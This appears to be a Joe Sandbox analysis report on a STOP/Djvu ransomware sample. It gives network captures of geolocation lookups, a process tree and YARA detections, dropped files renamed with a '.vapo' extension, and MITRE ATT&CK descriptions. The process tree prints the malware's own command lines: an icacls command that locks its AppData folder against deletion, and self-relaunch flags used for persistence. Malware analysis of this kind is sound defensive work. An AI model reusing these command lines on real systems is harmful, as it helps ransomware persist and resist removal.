2024-01-26 00:36:08 UTC	893	IN	HTTP/1.1 200 OK Date: Fri, 26 Jan 2024 00:36:08 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Aoq1XNyDiaEYN4edJXffieQby1LGlxhP9utRy%2Fl4BIz1ImJqRgjqimPmr5AKKyq3oizcTLHUf3te%2BbvxA%2FyPKdykWpNa21yCxRDw%2BYmBPPXp6FuuwOFEdlr%2B7eX9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 84b4ae0ce844b033-ATL alt-svc: h3=":443"; ma=86400
2024-01-26 00:36:08 UTC	461	IN	Data Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
2024-01-26 00:36:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-26 00:36:15 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-01-26 00:36:16 UTC	891	IN	HTTP/1.1 200 OK Date: Fri, 26 Jan 2024 00:36:16 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ybia5u8J%2BCRNvslAuN078TLOkYVXoBDaTCNj%2BcApFUNo4wMHBAbxNjopJ9lyOm30XBo4lNC%2FBJPurxWzlpqdF1FPp9XEW3tJp3llArBKCBqoBEGLECWfd750cBT%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 84b4ae3f897b1363-ATL alt-svc: h3=":443"; ma=86400
2024-01-26 00:36:16 UTC	461	IN	Data Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
2024-01-26 00:36:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	01:35:55
Start date:	26/01/2024
Path:	C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Imagebase:	0x470000
File size:	1'150'976 bytes
MD5 hash:	5CACD6F1B5CEC25F3F0B0B3C4D5807D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1675353698.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	01:35:57
Start date:	26/01/2024
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0x660000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	3
Start time:	01:35:58
Start date:	26/01/2024
Path:	C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe --Task
Imagebase:	0xe20000
File size:	1'150'976 bytes
MD5 hash:	5CACD6F1B5CEC25F3F0B0B3C4D5807D3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1702670598.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, Author: ditekSHen
Antivirus matches:	Detection: 87%, ReversingLabs Detection: 76%, Virustotal, Browse
Reputation:	low
Has exited:	false

Target ID:	4
Start time:	01:36:05
Start date:	26/01/2024
Path:	C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
Imagebase:	0xe20000
File size:	1'150'976 bytes
MD5 hash:	5CACD6F1B5CEC25F3F0B0B3C4D5807D3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1787026670.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1774903809.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Target ID:	5
Start time:	01:36:13
Start date:	26/01/2024
Path:	C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
Imagebase:	0xe20000
File size:	1'150'976 bytes
MD5 hash:	5CACD6F1B5CEC25F3F0B0B3C4D5807D3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.1868782664.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.1855703010.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Djvu

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.vapo (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.vapo (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.vapo (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.vapo (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.vapo (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

Windows Analysis Report
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	36.4%
Total number of Nodes:	832
Total number of Limit Nodes:	93

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	189

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre